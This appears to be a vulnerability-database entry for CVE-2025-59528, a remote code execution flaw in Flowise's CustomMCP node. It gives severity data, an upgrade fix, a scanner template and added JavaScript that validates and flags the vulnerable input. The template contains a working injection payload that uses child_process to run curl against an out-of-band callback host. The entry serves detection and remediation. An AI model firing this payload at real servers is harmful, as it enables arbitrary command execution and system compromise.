Flowise - Remote Code Execution

CVE-2025-59528
Verified

Description

Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function. Remote attackers can execute arbitrary code with full Node.js privileges. Exploitation requires user input to be processed by the vulnerable node.

Severity

Critical

CVSS Score

10

Exploit Probability

87%

Published Date

April 2, 2026

Template Author

xtr0nix

CVE-2025-59528.yaml
id: CVE-2025-59528

info:
  name: Flowise - Remote Code Execution
  author: xtr0nix
  severity: critical
  description: |
    Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node.
  impact: |
    Attackers can execute arbitrary code with full Node.js privileges, potentially leading to full system compromise.
  remediation: |
    Update to version 3.0.6 or later.
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-59528
    epss-score: 0.86781
    epss-percentile: 0.99437
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,flowise,rce,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{email}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "email", "name")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/v1/node-load-method/customMCP HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-request-from: internal

        {"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.execSync(\"curl {{interactsh-url}}\");return 1;})()})"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "No Available Actions")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402200af9be097ca099f3289235230d0dccdd4254fb7997e9e8f6406335105ba972600220276edb63a851bcfe81d689b6f5bd97cb1743fcb507596bbce33802254c9691d2:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID: CVE-2025-59528
CWE ID: CWE-94

References

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
https://nvd.nist.gov/vuln/detail/CVE-2025-59528

Remediation Steps

Update to version 3.0.6 or later.
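
Where upgrading is delayed, or to review recorded traffic, the mcpServerConfig input can be treated strictly as data. The JavaScript below is an added example, not Flowise's code and not part of the template: the function names and the allow-list of config keys are assumptions, and the sample bodies are constructed. It parses the value with JSON.parse only and flags customMCP requests whose config is not strict JSON.

```javascript
// Added example: strict, data-only handling of the CustomMCP "mcpServerConfig" input.
// Names and the allowed key list are assumptions; the config is assumed to be a string.
const CUSTOM_MCP_PATH = '/api/v1/node-load-method/customMCP';
// Hypothetical allow-list of top-level keys for an MCP server config.
const ALLOWED_KEYS = new Set(['command', 'args', 'env', 'url', 'headers']);

// Parse the config as data only. JSON.parse never executes its input,
// so function expressions and other JavaScript syntax are rejected.
function parseMcpServerConfig(raw) {
  if (typeof raw !== 'string') throw new TypeError('config must be a string');
  let value;
  try {
    value = JSON.parse(raw);
  } catch (err) {
    throw new SyntaxError('mcpServerConfig is not strict JSON');
  }
  if (value === null || typeof value !== 'object' || Array.isArray(value)) {
    throw new TypeError('mcpServerConfig must be a JSON object');
  }
  for (const key of Object.keys(value)) {
    if (!ALLOWED_KEYS.has(key)) throw new TypeError(`unexpected key: ${key}`);
  }
  return value;
}

// Detection helper for a proxy or log pipeline that records request bodies:
// returns a finding when a customMCP request carries a config that fails parsing.
function inspectRequest(method, path, bodyText) {
  if (method !== 'POST' || path.split('?')[0] !== CUSTOM_MCP_PATH) return null;
  let body;
  try {
    body = JSON.parse(bodyText);
  } catch (err) {
    return { path, reason: 'request body is not JSON' };
  }
  const raw = body && body.inputs && body.inputs.mcpServerConfig;
  if (raw == null) return null;
  try {
    parseMcpServerConfig(raw);
    return null;
  } catch (err) {
    return { path, reason: err.message };
  }
}

// Constructed sample bodies (not captured traffic).
const benignBody = JSON.stringify({ loadMethod: 'listActions',
  inputs: { mcpServerConfig: '{"command":"npx","args":["-y","example-mcp"]}' } });
const nonJsonBody = JSON.stringify({ loadMethod: 'listActions',
  inputs: { mcpServerConfig: '({x:(function(){return 1;})()})' } });
```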